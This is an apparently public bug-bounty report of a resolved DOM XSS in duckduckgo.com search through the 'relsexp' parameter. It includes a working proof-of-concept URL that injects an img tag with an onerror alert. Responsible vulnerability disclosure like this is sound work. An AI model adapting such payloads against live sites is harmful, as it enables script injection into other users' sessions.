DOM XSS on duckduckgo.com search
Medium
Vulnerability Details
Hello,
The is a DOM XSS vulnerability on https://duckduckgo.com search through the `relsexp` parameter.
PoC URL: ` https://duckduckgo.com/?q=a&relsexp="><img src=/ onerror=alert(document.domain)>&ia=web`
Screenshot:
{F830875}
Video:
{F830880}
## Impact
The attacker can execute JS code.
Actions
View on HackerOneReport Stats
- Report ID: 876148
- State: Closed
- Substate: resolved
- Upvotes: 74